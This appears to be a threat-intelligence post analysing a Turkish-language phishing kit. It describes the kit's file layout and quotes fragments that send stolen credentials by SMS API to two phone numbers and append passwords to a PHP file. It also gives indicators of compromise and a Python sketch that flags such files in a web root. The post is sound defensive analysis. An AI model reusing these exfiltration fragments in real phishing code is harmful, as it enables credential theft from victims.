#SmsKit #PhishingKitType #phishing #phishingkit
@Jouliok found an interesting phishing kit on 5/26/2019. Much of it is written in Turkish, and it has an interesting feature: it sends the stolen data by SMS text message, via an API, to 2 phone numbers.
The file \confirm\connect.php appears to send the text messages via this API to these numbers:
$url = 'http://derinsms.com/site/hiztesti';
curl_setopt($ch,CURLOPT_URL, $url);
sms('5350722654')
sms('5457867704');
The phishing kit had the following folder structure:
\.htaccess
\check.php (posts to \confirm\index.php)
\index.php (posts to check.php)
\confirm\.htacess
\confirm\connect.php
\confirm\index.php
\confirm\mailconfirmation.php
\confirm\sefababanz.php
\confirm\success.php
Multiple files, such as index.php and success.php, use base64-encoded images, for example:
background: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAA
The file \confirm\index.php writes stolen passwords to a PHP file:
$file = fopen('sefababanz.php', 'a');
and has the default time zone set to:
date_default_timezone_set('Europe/Istanbul');
Many words in the PHP files are written in Turkish.
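A web-root triage sketch built from the indicators listed above, added here as an example; it is not part of the kit or of the original analysis. The weights, threshold, function names and the sample file contents (including the phone number) are constructed assumptions.

```python
import re

# Indicators come from the kit description above; the weights are assumptions.
INDICATORS = {
    "sms_api_url": (re.compile(r"derinsms\.com/site/hiztesti", re.I), 3),
    "sms_call": (re.compile(r"\bsms\(\s*['\"]\d{10}['\"]\s*\)"), 2),
    "append_to_php": (re.compile(
        r"fopen\(\s*['\"][^'\"]+\.php['\"]\s*,\s*['\"]a\+?b?['\"]\s*\)", re.I), 2),
    "istanbul_tz": (re.compile(
        r"date_default_timezone_set\(\s*['\"]Europe/Istanbul['\"]\s*\)"), 1),
    "inline_png": (re.compile(r"data:image/png;base64,"), 1),
}

def scan_source(text):
    """Return (score, sorted indicator names) for one PHP file's text."""
    hits = sorted(n for n, (rx, _) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[n][1] for n in hits), hits

def triage(files, threshold=3):
    """files maps path -> source text; keep files scoring at or above threshold.

    A time zone or an inline image alone is common in legitimate PHP, so
    those weak indicators only count when combined with a stronger one.
    """
    flagged = {}
    for path, text in files.items():
        score, hits = scan_source(text)
        if score >= threshold:
            flagged[path] = (score, hits)
    return flagged

# Constructed sample files (not copied from the kit; the phone number is made up).
SAMPLE = {
    "confirm/connect.php": "<?php $url = 'http://derinsms.com/site/hiztesti';\n"
                           "curl_setopt($ch,CURLOPT_URL, $url);\n"
                           "sms('5550000001');",
    "confirm/index.php": "<?php date_default_timezone_set('Europe/Istanbul');\n"
                         "$file = fopen('sefababanz.php', 'a');",
    "blog/index.php": "<?php date_default_timezone_set('Europe/Istanbul');"
                      " echo 'merhaba';",
}

if __name__ == "__main__":
    for path, (score, hits) in sorted(triage(SAMPLE).items()):
        print(f"{path}: score={score} indicators={','.join(hits)}")
```

To scan a real web root, read each `.php` file with `errors="replace"` and pass the resulting path-to-text mapping to `triage`.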
example 1:
md5 51196e341ae46418d56babdcb2d1a36d
https://www.virustotal.com/#/file/26b7a22c38326be6a0748c43005457732612fd2a084c42f0462fb27cdf97268e/detection
hxxp://instagram-copyrghtcenter[.]ml
references
https://twitter.com/Jouliok/status/1132555353533685760